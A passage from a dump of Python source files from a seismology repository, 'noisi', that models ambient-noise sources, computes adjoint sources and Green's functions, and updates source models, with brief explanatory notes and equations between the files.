"text": "import numpy as np\nimport json\nimport os\nimport io\nfrom obspy.geodetics import gps2dist_azimuth\nfrom noisi.util.geo import len_deg_lat, len_deg_lon\nfrom warnings import warn\n \n\ndef points_on_sphere(dx,xmin=-180.,xmax=180.,ymin=-89.999,ymax=89.999,c_centr=None,\\\nradius=None):\n \"\"\"\n Calculate a more or less equally spaced grid on spherical Earth's surface.\n :param dx: spacing in latitudinal and longitudinal direction in meter\n :type c_centr: Tuple\n :param c_centr: Specify a central location\n :type radius: float\n :param radius: Radius around central location in m; no sources beyond this will be included\n :returns: np.array(latitude, longitude) of grid points, where -180<=lon<180 and -90 <= lat < 90\n \"\"\"\n \n if xmax <= xmin or ymax <= ymin:\n msg = 'Lower bounds must be lower than upper bounds.'\n raise ValueError(msg)\n\n \n gridx = []\n gridy = []\n \n lat = ymin\n if ymin == -90.:\n ymin = -89.999\n warn(\"Resetting lat_min to -89.999 degree\")\n \n while lat <= ymax:\n d_lat = dx / len_deg_lat(lat)\n d_lon = dx / len_deg_lon(lat)\n \n lon = xmin + np.random.rand(1)[0] * d_lon\n\n while lon <= xmax:\n \n gridx.append(lon)\n gridy.append(lat)\n\n if c_centr and radius:\n if gps2dist_azimuth(lat,lon,c_centr[0],c_centr[1])[0] > radius:\n print(lat,lon,gps2dist_azimuth(lat,lon,c_centr[0],c_centr[1])[0])\n if abs(lat) != 90.:\n d_lon = dx / len_deg_lon(lat)\n lon += d_lon\n continue\n else:\n break\n\n \n if abs(lat) == 90:\n # length of a degree longitude will be 0.\n break\n else:\n d_lon = dx / len_deg_lon(lat)\n lon += d_lon\n lat += d_lat # do not start at pole or zero division will raise...\n \n \n # return values sorted by longitude, basemap likes it.\n grid = list(zip(*sorted(zip(gridx, gridy), key=lambda it: it[0])))\n return list((gridx,gridy))#grid\n\n\n\n \ndef create_sourcegrid(config):\n \n cfile = open(config,'r')\n config = json.load(cfile)\n cfile.close()\n # ToDo: Pretty printing of all dictionaries such as this one.\n print(config)\n \n #ToDo read extra parameters into configuration\n grid = points_on_sphere(config['grid_dx'],\n xmin=config['grid_lon_min'],\n xmax=config['grid_lon_max'],\n ymin=config['grid_lat_min'],\n ymax=config['grid_lat_max'],\n c_centr=config['grid_coord_centr'],radius=config['grid_radius'])\n \n sources = np.zeros((2,len(grid[0])))\n #sources[0,:] = ids\n sources[0:2,:] = grid\n \n print('Number of gridpoints:',np.size(grid)/2)\n \n return sources\n \n \n#def grid_to_specfem_stations(grid,outfile):\n# \"\"\"\n# Write noisesource grid to disk as specfem compatible station list.\n# \"\"\"\n# \n# fid = open(outfile,'w')\n# for i in range(len(grid[0,:])):\n# fid.write('%08g SRC %10.8f %10.8f 0.0 0.0\\n'\\\n# %(i,grid[1,i],grid[0,i]))\n# \n# fid.close()\n# \n\ndef setup_sourcegrid(configfile,out='specfem'):\n \n sourcegrid = create_sourcegrid(configfile)\n \n with io.open(configfile,'r') as fh:\n config = json.load(fh)\n grid_filename = os.path.join(config['project_path'],'sourcegrid.npy')\n \n \n \n # write to .npy\n np.save(grid_filename,sourcegrid)\n # write to specfem friendly text file\n # or whatever\n #if out == 'specfem':\n #stations_filename = os.path.join(config['project_path'],'STATIONS')\n #grid_to_specfem_stations(sourcegrid,stations_filename)\n \n"
},
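A hypothetical call of points_on_sphere (the numbers are invented): dx is the target spacing in metres and the bounds are in degrees, so the following builds a roughly 200 km quasi-uniform grid over the North Atlantic. Note that, despite its docstring, the function currently returns a plain [lons, lats] list rather than an np.array, and each latitude row gets a random longitude offset, so two runs give slightly different grids.

lons, lats = points_on_sphere(200000.,
                              xmin=-60., xmax=0.,
                              ymin=20., ymax=70.)
print(len(lons), 'grid points at ~200 km spacing')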
{
"alpha_fraction": 0.519087553024292,
"alphanum_fraction": 0.5252334475517273,
"avg_line_length": 33.96281051635742,
"blob_id": "f075b9862e932c26fd83ec10098bce3f0ae132c0",
"content_id": "3fd9046149f6e3e9e4629a5b3aac5b3f0ea62ce0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8461,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 242,
"path": "/noisi/scripts/run_adjointsrcs.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nfrom math import log, pi\nimport click\nimport json\nfrom scipy.signal import hilbert\nfrom glob import glob\nfrom obspy import read, Trace, Stream\nfrom obspy.geodetics import gps2dist_azimuth\n\nfrom noisi.scripts import adjnt_functs as af\nfrom noisi.util.corr_pairs import get_synthetics_filename\nfrom noisi.util.windows import my_centered, snratio\nfrom warnings import warn\n\ndef get_station_info(stats):\n\n sta1 = '{}.{}.{}.{}'.format(stats.network,stats.station,stats.location,\n stats.channel)\n sta2 = '{}.{}.{}.{}'.format(stats.sac.kuser0.strip(),stats.sac.kevnm.strip(),\n stats.sac.kuser1.strip(),stats.sac.kuser2.strip())\n lat1 = stats.sac.stla\n lon1 = stats.sac.stlo\n lat2 = stats.sac.evla\n lon2 = stats.sac.evlo\n dist = stats.sac.dist\n az = gps2dist_azimuth(lat1,lon1,lat2,lon2)[2]\n\n\n return([sta1,sta2,lat1,lon1,lat2,lon2,dist,az])\n\ndef get_essential_sacmeta(sac):\n\n newsacdict={}\n #==============================================================================\n #- Essential metadata\n #==============================================================================\n\n newsacdict['user0'] = sac['user0']\n newsacdict['b'] = sac['b']\n newsacdict['e'] = sac['e']\n newsacdict['stla'] = sac['stla']\n newsacdict['stlo'] = sac['stlo']\n newsacdict['evla'] = sac['evla']\n newsacdict['evlo'] = sac['evlo']\n newsacdict['dist'] = sac['dist']\n newsacdict['az'] = sac['az']\n newsacdict['baz'] = sac['baz']\n newsacdict['kuser0'] = sac['kuser0']\n try:\n newsacdict['kuser1'] = sac['kuser1']\n except KeyError:\n newsacdict['kuser1'] = ''\n newsacdict['kuser2'] = sac['kuser2']\n newsacdict['kevnm'] = sac['kevnm']\n\n return newsacdict\n\n\n\n\ndef adjointsrcs(source_config,mtype,step,ignore_network,bandpass,\n taper_perc,**options):\n\n \"\"\"\n Get 'adjoint source' from noise correlation data and synthetics.\n options: g_speed,window_params (only needed if mtype is ln_energy_ratio or enery_diff)\n \"\"\"\n\n\n files = [f for f in os.listdir(os.path.join(source_config['source_path'],\n 'observed_correlations')) ]\n files = [os.path.join(source_config['source_path'],\n 'observed_correlations',f) for f in files]\n\n\n step_n = 'step_{}'.format(int(step))\n synth_dir = os.path.join(source_config['source_path'],\n step_n,'corr')\n adj_dir = os.path.join(source_config['source_path'],\n step_n,'adjt')\n\n\n\n if files == []:\n msg = 'No input found!'\n raise ValueError(msg)\n\n #i = 0\n hws = options['window_params']['hw'][:]\n g_speed = options['g_speed'][:]\n\n\n with click.progressbar(files,label='Determining adjoint sources...') as bar:\n\n for f in bar:\n\n # read data\n try:\n tr_o = read(f)[0]\n except:\n print('\\nCould not read data: '+os.path.basename(f))\n #i+=1\n continue\n\n # read synthetics\n try:\n synth_filename = get_synthetics_filename(os.path.basename(f),\n synth_dir,ignore_network=ignore_network)\n if synth_filename is None:\n continue\n #sname = glob(os.path.join(synth_dir,synth_filename))[0]\n print(synth_filename)\n tr_s = read(synth_filename)[0]\n\n except:\n print('\\nCould not read synthetics: '+os.path.basename(f))\n #i+=1\n continue\n\n # Add essential metadata\n tr_s.stats.sac = get_essential_sacmeta(tr_o.stats.sac)\n\n # Check sampling rates.\n if round(tr_s.stats.sampling_rate,6) != round(tr_o.stats.\n sampling_rate,6):\n print(\"Sampling Rates (Hz):\\n\")\n print(tr_s.stats.sampling_rate)\n print(tr_o.stats.sampling_rate)\n msg = 'Sampling rates of data and synthetics must match.'\n raise ValueError(msg)\n\n \n func = 
af.get_adj_func(mtype)\n\n # ugly...sorry\n\n # Bandpasses\n for j in range(len(bandpass)):\n\n options['window_params']['hw'] = hws[j]\n options['g_speed'] = g_speed[j]\n\n tr_o_filt = tr_o.copy()\n tr_s_filt = tr_s.copy()\n \n # Waveforms must have same nr of samples.\n tr_s_filt.data = my_centered(tr_s_filt.data,tr_o.stats.npts)\n\n bp = bandpass[j]\n if bp != None:\n tr_o_filt.taper(taper_perc)\n tr_o_filt.filter('bandpass',freqmin=bp[0],freqmax=bp[1],\n corners=bp[2],zerophase=True)\n tr_s_filt.taper(taper_perc)\n tr_s_filt.filter('bandpass',freqmin=bp[0],freqmax=bp[1],\n corners=bp[2],zerophase=True)\n \n\n\n\n #======================================================\n # Weight observed stack by nstack\n #======================================================\n\n tr_o_filt.data /= tr_o_filt.stats.sac.user0\n \n data, success = func(tr_o_filt,tr_s_filt,**options)\n if not success:\n continue\n\n adj_src = Stream()\n\n if isinstance(data,list):\n\n adj_src += Trace(data=data[0])\n adj_src += Trace(data=data[1])\n brnchs = ['c','a']\n for k in range(2):\n adjtrc = adj_src[k]\n adjtrc.stats.sampling_rate = tr_s.stats.sampling_rate\n adjtrc.stats.sac = tr_s.stats.sac.copy()\n # Save the adjoint source\n file_adj_src = os.path.join(adj_dir,\n os.path.basename(synth_filename).\n rstrip('sac')+'{}.{}.sac'.format(brnchs[k],j))\n adjtrc.write(file_adj_src,format='SAC')\n\n\n else:\n adj_src += Trace(data=data)\n for adjtrc in adj_src:\n adjtrc.stats.sampling_rate = tr_s.stats.sampling_rate\n adjtrc.stats.sac = tr_s.stats.sac.copy()\n # Save the adjoint source\n file_adj_src = os.path.join(adj_dir,\n os.path.basename(synth_filename).\n rstrip('sac')+'{}.sac'.format(j))\n adjtrc.write(file_adj_src,format='SAC')\n return()\n\n\n\ndef run_adjointsrcs(source_configfile,measr_configfile,step,ignore_network):\n\n source_config=json.load(open(source_configfile))\n measr_config=json.load(open(measr_configfile))\n\n g_speed = measr_config['g_speed']\n mtype = measr_config['mtype']\n bandpass = measr_config['bandpass']\n taper_perc = measr_config['taper_perc']\n\n if bandpass == None:\n bandpass = [None]\n\n if type(bandpass[0]) != list and bandpass[0] != None:\n bandpass = [bandpass]\n warn('\\'Bandpass\\' should be defined as list of filters.')\n\n window_params = {}\n window_params['hw'] = measr_config['window_params_hw']\n if type(window_params['hw']) != list:\n window_params['hw'] = [window_params['hw']]\n if len(window_params['hw']) != len(bandpass):\n warn('Using the same window length for all measurements.')\n window_params['hw'] = len(bandpass)*[window_params['hw'][0]]\n if type(measr_config['g_speed']) in [float,int]:\n warn('Using the same group velocity for all measurements.')\n g_speed = len(bandpass)*[measr_config['g_speed']]\n elif type(measr_config['g_speed']) == list \\\n and len(measr_config['g_speed']) == len(bandpass):\n g_speed = measr_config['g_speed']\n\n window_params['sep_noise'] = measr_config['window_params_sep_noise']\n window_params['win_overlap'] = measr_config['window_params_win_overlap']\n window_params['wtype'] = measr_config['window_params_wtype']\n window_params['causal_side'] = measr_config['window_params_causal']\n window_params['plot'] = False \n adjointsrcs(source_config,mtype,step,ignore_network=ignore_network,\n g_speed=g_speed,bandpass=bandpass,\n taper_perc=taper_perc,window_params=window_params)\n"
},
{
"alpha_fraction": 0.6703763604164124,
"alphanum_fraction": 0.6835289597511292,
"avg_line_length": 30.578275680541992,
"blob_id": "f19e29c7e37d17e4e8aa49e0328d010b00da781c",
"content_id": "16814f676cd40fe0416901faa6df71342117fbe2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9884,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 313,
"path": "/noisi/scripts/create_update.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport os\nimport json\n\nfrom glob import glob\nfrom math import isnan\nimport sys\nfrom noisi.util.corr_pairs import glob_obs_corr\nfrom noisi.my_classes.noisesource import NoiseSource\nfrom warnings import warn\n####################################\n# ToDo: more fancy and more secure with click or argparse\nsource_model = sys.argv[1]\noldstep = int(sys.argv[2])\ngrad_file = sys.argv[3]\ngrad_old = sys.argv[4]\nupdate_mode = sys.argv[5]#'conjgrad'# steepest, conjgrad\nmin_snr = float(sys.argv[6])#min_snr = 5.0\nmin_stck = int(sys.argv[7])#min_stck = 320.\nnr_msr = int(sys.argv[8])#nr_msr = 300\nstep_length = float(sys.argv[9])#step_length = \nmode = sys.argv[10] # 'max', 'random'\n# Give as part per hundred, e.g 0.1 for 10%\nperc_step_length = None\n# include those data points in the test which are at or above this\n# fraction of maximum misfit:\nperc_of_max_misfit = 0.6666\n# Only if the following is set to True, a small subset (nr_msr) \n# of data will be selected and copied and their misfit evaluated\n# for a step length test. Otherwise, only the update of the source model\n# is performed. \n\n####################################\n\n\ndef _update_steepestdesc(model,\n\tneg_grad,\n\tstep_length=None,\n\tperc_step_length=None,\n\tproject=False,\n\tsmooth=False):\n\n\tif step_length is not None and perc_step_length is not None:\n\t\traise ValueError('Only one of step_length and perc_step_length can\\\n\t\t\tbe specified.')\n\n# just in case:\n\t#os.system('cp {} {}'.format(model,model+'.bak'))\n\n\t\n\n# smooth the model\n\tif smooth:\n\t\traise NotImplementedError('Sorry, not implemented yet.')\n\n# project the model\n\tif project:\n\t\traise NotImplementedError('Sorry, not implemented yet.')\n\t\t# if implemented, here should be a projection of the new kernel\n\t\t# onto the distr_basis functions, thereby yielding the new distr_weights\n\n\telse:\n\t# the spectrum remains unchanged.\n\t# assuming there is one basis only, this will be updated with the new kernel\n\t\tif step_length is not None:\t\n\t\t\t#src_model.model['distr_basis'][:] += neg_grad * step_length\n\t\t\tdescent_direction = neg_grad * step_length\n\t\telif perc_step_length is not None:\n\t\t\t#src_model.model['distr_basis'][:] += neg_grad/np.max(np.abs(neg_grad)) * perc_step_length\n\t\t\tdescent_direction = neg_grad/np.max(np.abs(neg_grad)) * perc_step_length\n\n# write to file\n# close the underlying h5 file\t\n\t#src_model.model.close()\n\n\treturn(descent_direction)\n\ndef _update_conjugategrad(\n\tmodel,\n\tneg_grad,\n\told_grad,\n\told_upd,\n\tupdatename,\n\tstep_length\n\t):\n# just in case:\n\t#os.system('cp {} {}'.format(model,model+'.bak'))\n\n\t#src_model = NoiseSource(model)\n\n\t# determine beta\n\tnorm_neggrad = np.linalg.norm(-1.*neg_grad,ord=2,axis=(1))\n\tnorm_oldgrad = np.linalg.norm(old_grad,ord=2,axis=(1))\n\n\tbeta = np.power(norm_neggrad,2) / np.power(norm_oldgrad,2)\n\tprint(beta)\n\tprint(neg_grad[0:10])\n\tbeta_update = np.dot(beta,old_upd)\n\tprint(beta_update[0:10])\n\n\tupd = neg_grad + beta_update\n\tnp.save(updatename,upd)\n\n\t# save the update so it can be used to determine the next step\n\t#np.save(updatename,upd)\n\n\t#src_model.model['distr_basis'][:] += step_length * upd\n\tdescent_direction = step_length * upd\n\t\n\n\tprint(step_length*upd[0:20])\n\t\n\t\n\treturn(descent_direction,upd)\n\n\n\ndef _prepare_test_steplength(msrfile,source_config,newdir):\n\t\n\tobs_dir = 
os.path.join(source_config['source_path'],'observed_correlations')\n\n\n\t# Read in the csv files of measurement.\n\tfor mfile in msrfile:\n\t\tif 'data' not in locals():\n\t\t\tdata = pd.read_csv(mfile)\n\t\telse:\n\t\t\t# We get the addition of both datasets, which means that l2_norms of all\n\t\t\t# measurements are added up and the stations pairs with max overall misfit are chosen\n\t\t\tdata.l2_norm += pd.read_csv(mfile).l2_norm\n\t\t\tdata.nstack += pd.read_csv(mfile).nstack\n\n\n\t# Get a set of n randomly chosen station pairs. Criteria: minimum SNR, \n\t# ---> prelim_stations.txt\n\t\n\t# this makes no sense for combined measure\n\t#data_accept = data[(data.snr >= min_snr)]\n\t#if len(data_accept) == 0:\n#\t\traise ValueError('No data match selection criteria.')\n\n\t#data_accept = data_accept[(data_accept.snr_a >= min_snr)]\n\t#if len(data_accept) == 0:\n#\t\traise ValueError('No data match selection criteria.')\n\n\t#data_accept = data_accept[(data_accept.nstack >= min_stck)]\n\tdata_accept = data[(data.nstack >= min_stck)]\n\tif len(data_accept) == 0:\n\t\traise ValueError('No data match selection criteria.')\n\t\n\tdata_accept = data_accept[~(data_accept.l2_norm.apply(np.isnan))]\n\tif len(data_accept) == 0:\n\t\traise ValueError('No data match selection criteria.')\n\n\tdata_accept = data_accept[~(data_accept.snr.apply(np.isnan))]\n\tif len(data_accept) == 0:\n\t\traise ValueError('No data match selection criteria.')\n\n\tdata_accept = data_accept[~(data_accept.snr_a.apply(np.isnan))]\n\tif len(data_accept) == 0:\n\t\traise ValueError('No data match selection criteria.')\n\t\n\n\t# select data...\n\tif mode =='random':\n\t\tdata_select = data_accept.sample(n=nr_msr)\n\telif mode == 'max':\n\t\tdata_select1 = data_accept.sort_values(by='l2_norm',na_position='first')\n\t\tdata_select = data_select1.iloc[-nr_msr:]\n\t\n\tprint(data_select)\n\n\t#data_select = pd.concat([data_select1,data_select2])\n\t\n\t#stafile = open(os.path.join(newdir,'stations_slt.txt'),'w')\n\t#stafile.write(\"Station pairs to be used for step lenght test:\\n\")\n\n\tinffile = open(os.path.join(newdir,'step_length_test_info.txt'),'w')\n\tinffile.write('Parameters:\\n')\n\tinffile.write('source_model: %s\\n' %source_model)\n\tinffile.write('old step: %s\\n' %oldstep)\n\tinffile.write('min_snr %g\\n' %min_snr)\n\tinffile.write('min_stck %g\\n' %min_stck)\n\n\tif step_length is not None:\n\t\tinffile.write('step_length %g\\n' %step_length)\n\telif perc_step_length is not None:\n\t\tinffile.write('step_length as fraction of max. 
weight%g\\n' %perc_step_length)\n\tinffile.write('-'*40)\n\tinffile.write(\"\\nStation pairs to be used for step lenght test:\\n\")\n\n\tcum_misf = 0.0\n\t# Take care of the test set for the step length test\n\t\n\tfor i in data_select.index:\n\t\t\n\t\tsta1 = data_select.at[i,'sta1'].split('.')[0:4]\n\t\tsta2 = data_select.at[i,'sta2'].split('.')[0:4]\n\t\t\n\t\t#lat1 = data_select.at[i,'lat1']\n\t\t#lat2 = data_select.at[i,'lat2']\n\t\t#lon1 = data_select.at[i,'lon1']\n\t\t#lon2 = data_select.at[i,'lon2']\n\n\t\tmisf = data_select.at[i,'l2_norm']\n\n\t\tcum_misf += misf\n\t\t# synthetics in the old directory?\n\t\t#synth_filename = os.path.join(datadir,'corr','{}--{}.sac'.format(sta1,sta2))\n\t\t#print(synth_filename)\n\t\t# copy the relevant observed correlation, oh my\n\t\tobs_dir = os.path.join(source_config['source_path'],'observed_correlations')\n\t\tobs_correlations = glob_obs_corr('{}.{}.{}.{}'.format(*sta1),\n\t\t\t'{}.{}.{}.{}'.format(*sta2),obs_dir,ignore_network=True)\n\t\t\n\n\t\tif len(obs_correlations) > 0:\n\n\t\t\t# Use preferentially '', '00' channels.\n\t\t\tobs_correlations.sort()\n\t\t\tcorr = obs_correlations[0]\n\n\t\t\t#sta1 = sta1.split('.')\n\t\t\t#sta2 = sta2.split('.')\n\t\t\t#stafile.write('{} {} {} {}\\n'.format(*(sta1[0:2]+[lat1]+[lon1])))\n\t\t\t#stafile.write('{} {} {} {}\\n'.format(*(sta2[0:2]+[lat2]+[lon2])))\n\n\t\t\t#inffile.write('{} {}, {} {} L2 misfit: {}\\n'.format(*(sta1[0:2]+sta2[0:2]+[misf])))\n\t\t\tinffile.write('{}, {} L2 misfit: {}\\n'.format(sta1,sta2,misf))\n\n\t\t\tos.system('cp {} {}'.format(corr,os.path.join(newdir,'obs_slt')))\n\t\t\n\n\n\tinffile.write('-'*40)\n\tinffile.write('\\nCumulative misfit: %g\\n' %cum_misf)\n\tinffile.write('-'*40)\n\tinffile.close()\n\t#stafile.close()\n\n\treturn()\n\n############ Preparation procedure #################################################\n#prepare_test_steplength = False\n# where is the measurement database located?\nsource_model = os.path.join(source_model,'source_config.json')\nsource_config=json.load(open(source_model))\ndatadir = os.path.join(source_config['source_path'],'step_' + str(oldstep))\nmsrfile = os.path.join(datadir,\"{}.*.measurement.csv\".format(source_config['mtype']))\nmsrfile = glob(msrfile)\n\n# Initialize the new step directory\nnewstep = int(oldstep) + 1\nnewdir = os.path.join(source_config['source_path'],'step_' + str(newstep))\n\nif not os.path.exists(newdir):\n\tnewdir = os.path.join(source_config['source_path'],'step_' + str(newstep))\n\tos.mkdir(newdir)\n\tos.mkdir(os.path.join(newdir,'obs_slt'))\n\tos.mkdir(os.path.join(newdir,'corr'))\n\tos.mkdir(os.path.join(newdir,'adjt'))\n\tos.mkdir(os.path.join(newdir,'grad'))\n\tos.mkdir(os.path.join(newdir,'kern'))\n\t_prepare_test_steplength(msrfile,source_config,newdir)\n\nos.system('cp {} {}'.format(os.path.join(datadir,'base_model.h5'),newdir))\nos.system('cp {} {}'.format(os.path.join(datadir,'starting_model.h5'),newdir))\n\n\n# Set up a prelim_sourcemodel.h5: \n# Contains starting model + step length * (-grad) for steepest descent\n# This would be the point to project to some lovely basis functions..\ngrad = grad_file\n\nneg_grad = -1. 
* np.load(grad)\nold_grad = np.load(grad_old)\n\nneg_grad = np.array(neg_grad,ndmin=2)\nold_grad = np.array(old_grad,ndmin=2)\n\nnew_sourcemodel = os.path.join(newdir,'starting_model.h5')\nnew_update = os.path.join(newdir,'grad','update.npy')\nold_upd = os.path.join(datadir,'grad','update.npy')\n\nsrc_model = NoiseSource(new_sourcemodel,w='r+')\n\nif not os.path.exists(old_upd):\n\told_upd = -1. * old_grad.copy()\nelse:\n\told_upd = np.load(old_upd)\n\nif update_mode == 'steepest':\n\n\tdescent_direction = _update_steepestdesc(new_sourcemodel,neg_grad,step_length=step_length,\n\tperc_step_length=perc_step_length,project=False,smooth=False)\n\nelif update_mode == 'conjgrad':\n\tdescent_direction, update = _update_conjugategrad(new_sourcemodel,neg_grad,old_grad,\n\told_upd,new_update,step_length)\n\tnp.save(new_update,update)\n\n\nsrc_model.model['distr_basis'][:] += descent_direction\n\n\nif src_model.model['distr_basis'][:].min() < 0.:\n\t\twarn('Step length leads to negative source model...reset values to be >=0.')\n\t\tsrc_model.model['distr_basis'][:] = src_model.model['distr_basis'][:].clip(0.0)\n\nsrc_model.model.close()\n# (outside of this script) forward model selected correlations\n# (outside of this script) evaluate misfit for selected correlations\n"
},
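Written out, the conjugate-gradient branch above (_update_conjugategrad) is a Fletcher-Reeves style update of the source model m_k with gradient g_k and fixed step length \alpha:

\beta_k = \frac{\lVert g_k \rVert_2^2}{\lVert g_{k-1} \rVert_2^2}, \qquad d_k = -g_k + \beta_k \, d_{k-1}, \qquad m_{k+1} = m_k + \alpha \, d_k

where d_{k-1} is read from the previous step's grad/update.npy (or initialised to -g_{k-1} when no previous update exists). This matches upd = neg_grad + beta_update and descent_direction = step_length * upd in the code, with the updated model finally clipped so it stays non-negative.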
{
"alpha_fraction": 0.5355972647666931,
"alphanum_fraction": 0.5823652148246765,
"avg_line_length": 25.81599998474121,
"blob_id": "e6607c70b795d751ee9029fa29516e3acc3ba868",
"content_id": "76bdf6f8ec89dbe1a451b8137903d834d778ae7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 3357,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 125,
"path": "/noisi/test/testdata/testsrc/setting_up_testmodel/precompute_1DGreen.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\n# In[1]:\n\n# Precompute a 1-D Green's function for a homogeneous membrane medium\nimport numpy as np\nimport os\nimport h5py\nfrom math import sqrt, pi\nfrom scipy.signal import hann\nfrom obspy.geodetics import gps2dist_azimuth\nimport matplotlib.pyplot as plt\nimport sys\n\n# In[2]:\n\n#stations_file = sys.argv[1]\n#stations = open(stations_file,'r').read().split('\\n')\n\n#rec_codes = []\n#rec_locations = []\n\n#for sta in stations:\n# if sta=='':\n# continue\n# inf = sta.split()\n# rec_codes.append(inf[0].strip()+'.'+inf[1].strip())\n# rec_locations.append([float(inf[2]),float(inf[3])])\n\n\n# set the parameters\noutput_location = './wavefield_vel'\nsrcgrid = np.load('./sourcegrid.npy')\nrec_codes = ['NET.STA1..CHA','NET.STA2..CHA']#['BO.SAG..BHZ','BO.NSK..BHZ','BO.KMT..BHZ','BO.IZH..BHZ']\nrec_locations = [[-1.,-1.],[1.,1.]]#[[36.2553,133.3050],[34.3403,132.0018],[33.6782,135.4899],[34.1359,129.2066]]\nv_phase = 3300.\nv_group = 2400.\nq = 100.\nrho = 3300.\nFs = 1.0\n\nnpts = 360\n# Apply a freq. domain taper to suppress high and low frequencies.\nfilt = [0.02,0.2]\ndata_quantity = 'VEL'\nntraces = len(srcgrid[0])\n\n\n# In[3]:\n\nfreq = np.fft.rfftfreq(2*int(npts),d=1.0/Fs)\nw = 2 * pi * freq\ng_fd = np.zeros(freq.shape,dtype=np.complex)\n\ndef green_membrane(r,plot=False):\n \n if data_quantity == 'DIS':\n fac1 = -1j*1./(rho*v_phase**2*4.)\n elif data_quantity == 'VEL':\n fac1 = w[1:]*1./(rho*v_phase**2*4.)\n fac2 = np.sqrt((2.*v_phase)/(pi*w[1:]*r))\n phase = -1j * w[1:] / v_phase * r + 1j * pi / 4.0\n decay = -(w[1:]*r)/(2.*v_phase*q)\n \n g_fd[1:] = fac1*fac2*np.exp(phase)*np.exp(decay)\n if plot:\n plt.plot(freq,np.abs(g_fd))\n plt.show()\n return g_fd\n\n\n# In[4]:\n\nfor i in range(len(rec_codes)):\n if not os.path.exists(output_location):\n os.mkdir(output_location)\n\n station = rec_codes[i]\n lat_sta = rec_locations[i][0]\n lon_sta = rec_locations[i][1]\n\n # initialize the file\n\n f_out_name = os.path.join(output_location, station + '.h5') \n with h5py.File(f_out_name, \"w\") as f_out:\n\n # DATASET NR 1: STATS\n stats = f_out.create_dataset('stats',data=(0,))\n stats.attrs['reference_station'] = station\n stats.attrs['data_quantity'] = data_quantity\n stats.attrs['ntraces'] = ntraces\n stats.attrs['Fs'] = Fs\n stats.attrs['nt'] = int(npts)\n\n # DATASET NR 2: Source grid\n sources = f_out.create_dataset('sourcegrid',data=srcgrid)\n\n # DATASET Nr 3: Seismograms itself\n traces = f_out.create_dataset('data',(ntraces,npts),dtype=np.float32)\n\n for k in range(ntraces):\n # for each location, determine the distance\n lat = srcgrid[1,k]\n lon = srcgrid[0,k]\n\n r = gps2dist_azimuth(lat,lon,lat_sta,lon_sta)[0]\n\n # evaluate the Greens fct.\n g1 = green_membrane(r)\n\n # apply the freq. domain taper\n taper = np.zeros(freq.shape)\n i0 = np.argmin(np.abs(freq-filt[0]))\n i1 = np.argmin(np.abs(freq-filt[1]))\n\n taper[i0:i1] = hann(i1-i0)\n\n # transform back to time domain\n g1_td = np.fft.irfft(g1)[0:npts]\n g1_td_taper = np.fft.irfft(taper*g1)[0:npts]\n\n\n # write the result\n traces[k,:] = g1_td_taper * 1.e10\n f_out.flush()\n\n\n\n\n"
},
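For reference, the frequency-domain response assembled in green_membrane above (for data_quantity == 'VEL', with phase velocity c = v_phase, density \rho, quality factor Q and source-receiver distance r) is

G(\omega, r) = \frac{\omega}{4 \rho c^{2}} \sqrt{\frac{2 c}{\pi \omega r}} \; e^{-\mathrm{i} \omega r / c + \mathrm{i} \pi / 4} \; e^{-\omega r / (2 c Q)}

i.e. fac1 * fac2 * exp(phase) * exp(decay) term by term; in the 'DIS' case the leading factor becomes -\mathrm{i} / (4 \rho c^{2}).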
{
"alpha_fraction": 0.7878788113594055,
"alphanum_fraction": 0.7878788113594055,
"avg_line_length": 33,
"blob_id": "4758bd06d1706e4f07eacdedb84566d74c528dd2",
"content_id": "26b457da5be2cf40195b109116cd81fd119aec47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 1,
"path": "/noisi/util/__init__.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "#from noisi.util.various import *"
},
{
"alpha_fraction": 0.629302978515625,
"alphanum_fraction": 0.6472261548042297,
"avg_line_length": 27.11199951171875,
"blob_id": "748b357d8102b4d94ee8124d247cc318a591a82d",
"content_id": "9e9a458eedf1292a9d003af1a69f48d6bc73b0cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3515,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 125,
"path": "/noisi/util/wavefield_from_instaseis.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# create a wavefield from instaseis\nfrom mpi4py import MPI\nimport instaseis\nimport h5py\nimport os\nimport sys\nfrom pandas import read_csv\nimport numpy as np\nimport json\nfrom noisi.util.geo import geograph_to_geocent\nfrom obspy.geodetics import gps2dist_azimuth\n\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n\n# get config\nsource_config=json.load(open('source_config.json'))\nconfig = json.load(open('../config.json'))\nFs = source_config['sampling_rate']\npath_to_db = config['wavefield_path']\nchannel = source_config['channel']\n\n# read sourcegrid\nf_sources = np.load('../sourcegrid.npy')\nntraces = f_sources.shape[-1]\n\n# open the database\ndb = instaseis.open_db(path_to_db)\n\n# get: synthetics duration and sampling rate in Hz\nstest = db.get_seismograms(source=instaseis.ForceSource(latitude=0.0,\n longitude=0.0),receiver=instaseis.Receiver(latitude=10.,\n longitude=0.0),dt=1./source_config['sampling_rate'])[0]\nntimesteps = stest.stats.npts\n\n\n# read station from file\nstationlist = read_csv('../stationlist.csv')\nnet = stationlist.at[rank,'net']\nsta = stationlist.at[rank,'sta']\nlat = stationlist.at[rank,'lat']\nlon = stationlist.at[rank,'lon']\nprint(net,sta,lat,lon)\n\n\n# output directory:\nif rank == 0:\n\tos.system('mkdir -p wavefield_processed')\n \ncomm.barrier()\n\nf_out_name = '{}.{}..{}.h5'.format(net,sta,channel)\nf_out_name = os.path.join('wavefield_processed',f_out_name)\n\n\nif not os.path.exists(f_out_name):\n\n startindex = 0\n\n f_out = h5py.File(f_out_name, \"w\")\n 